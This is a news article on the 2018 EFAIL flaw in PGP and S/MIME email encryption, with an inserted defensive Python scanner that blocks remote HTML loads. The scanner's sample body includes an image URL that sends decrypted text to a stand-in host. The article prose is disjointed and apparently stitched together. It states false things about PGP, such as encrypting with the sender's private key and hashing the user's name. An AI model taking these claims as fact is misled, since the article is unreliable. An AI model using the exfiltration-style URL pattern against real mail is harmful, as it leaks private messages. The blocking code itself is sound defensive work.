January 23, 2019

Popular encrypted email standards are unsafe

14 May 2018, 07:12 | Cameron Gross

Uninstall PGP: EFF warns of exploit that may reveal plaintext of encrypted emails


Security experts are warning PGP users to disable tools that automatically decrypt PGP-encrypted email after the discovery of a critical vulnerability which could help attackers read protected emails.

The researchers meant to hold off on full publication until Tuesday, May 15, but the white paper was published earlier after the embargo was broken. The digital privacy watchdog (the EFF) also suggested using alternatives such as Signal for the time being, until the implications of the vulnerabilities described in the paper are better understood, and hopefully mitigated, by the cybersecurity community.

The use of PGP for secure communications has been advocated, among others, by Edward Snowden, who blew the whistle on pervasive electronic surveillance at the US National Security Agency before fleeing to the Russian Federation.

Sebastian Schinzel, professor of computer science at Münster University, investigated the flaw, tweeting that full details of the vulnerability would be available from 15 May.

PGP uses an algorithm to generate a "hash", or mathematical summary, of a user's name and other information.

European researchers have found that the popular PGP and S/MIME email encryption standards are vulnerable to being hacked, leading them to urge people to disable and uninstall them immediately.

By comparison, the Gadget Attack affects a much wider variety of mail clients, including Microsoft's Outlook, but its effectiveness varies depending on whether it is used against PGP or S/MIME encryption.

"EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs".
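The quoted sentence describes the exfiltration channel: once the mail client decrypts the message, any HTML element that loads a remote resource turns the plaintext into part of an outbound request. The defensive counterpart is to inspect the decrypted body for such elements before rendering it. The following is an added example, written for this page and not code from the article or from the EFAIL researchers: a small standard-library Python scanner that lists every attribute or CSS reference that would trigger a network fetch, and a guard that neutralises them. The sample HTML body and the host name collector.example are constructed for the demonstration.

```python
"""
Added example (not from the article or the EFAIL authors): a mail-client-side
guard that inspects a decrypted HTML body for elements that would trigger an
outbound network request (the channel the article describes) and neutralises
them before the body is rendered. Standard library only.
"""
import re
from html.parser import HTMLParser

# Tag/attribute pairs that cause a fetch when the message is rendered.
FETCHING_ATTRS = {
    "img": ("src",), "link": ("href",), "script": ("src",),
    "iframe": ("src",), "video": ("src", "poster"), "audio": ("src",),
    "source": ("src",), "object": ("data",), "embed": ("src",),
    "input": ("src",), "body": ("background",),
}
# Remote references hidden in CSS: url(...) and @import.
CSS_URL_RE = re.compile(r"""url\(\s*['"]?\s*(https?:[^'")\s]+)""", re.I)
CSS_IMPORT_RE = re.compile(r"""@import\s+['"]?(https?:[^'")\s;]+)""", re.I)


class RemoteLoadScanner(HTMLParser):
    """Collects (tag, attribute, url) for every remote load in the body."""

    def __init__(self):
        super().__init__()
        self.hits = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        for name in FETCHING_ATTRS.get(tag, ()):
            val = attrs.get(name)
            if val and val.strip().lower().startswith(("http://", "https://")):
                self.hits.append((tag, name, val.strip()))
        # Inline style="..." may also carry url(...) references.
        style = attrs.get("style")
        if style:
            for url in CSS_URL_RE.findall(style):
                self.hits.append((tag, "style", url))
        if tag == "style":
            self._in_style = True

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        # Contents of <style> blocks are delivered here as raw text.
        if self._in_style:
            for url in CSS_URL_RE.findall(data) + CSS_IMPORT_RE.findall(data):
                self.hits.append(("style", "css", url))


def find_remote_loads(html):
    """Return the list of remote loads a renderer would perform for this body."""
    scanner = RemoteLoadScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.hits


def block_remote_content(html):
    """Replace every remote URL that would be fetched with about:blank.

    Returns (safe_html, hits) so the client can both render safely and
    log or warn about what was blocked. Local cid: references are untouched.
    """
    hits = find_remote_loads(html)
    clean = html
    for _, _, url in hits:
        clean = clean.replace(url, "about:blank")
    return clean, hits


# Constructed sample: what a client might see after decrypting a message that
# has been wrapped in HTML. The image URL carries text from the decrypted body.
SAMPLE_DECRYPTED_BODY = """<html><body>
<p>Quarterly numbers attached.</p>
<img src="https://collector.example/pixel?d=secret%20memo%20text">
<link rel="stylesheet" href="https://collector.example/s.css">
<div style="background:url('https://collector.example/bg.png')"></div>
<style>@import "https://collector.example/x.css"; p{color:red}</style>
<img src="cid:logo@local">
</body></html>"""

if __name__ == "__main__":
    safe, blocked = block_remote_content(SAMPLE_DECRYPTED_BODY)
    for tag, attr, url in blocked:
        print(f"blocked {tag}[{attr}] -> {url}")
    print(safe)
```

Running the block lists four blocked loads (the tracking image, the stylesheet link, the inline-style background and the `@import`) and leaves the local `cid:` image alone. A real client would pair this with a policy of not rendering HTML for decrypted content at all, which is the blunter mitigation the researchers' advice amounts to.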

"They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past", researchers said.

The attack relies on contacting the same person who sent the encrypted email in the first place.

While the requirement that attackers have access to previously sent e-mails is an extremely high bar, the entire objective of both PGP and S/MIME is to protect users against exactly this possibility.

UPDATE 2: Because some researchers started disclosing details about the vulnerability ahead of schedule, the website is now live, along with the research paper, both containing more info on the EFAIL vulnerability.

This is then encrypted with the sender's private "key" and decrypted by the receiver using a separate public key.

However, the researchers have confirmed the exploitable vulnerabilities only exist for email users. PGP and S/MIME are said to have flaws that could be exploited to get access to any incoming or outgoing emails on platforms that use either of the two encryption tools.
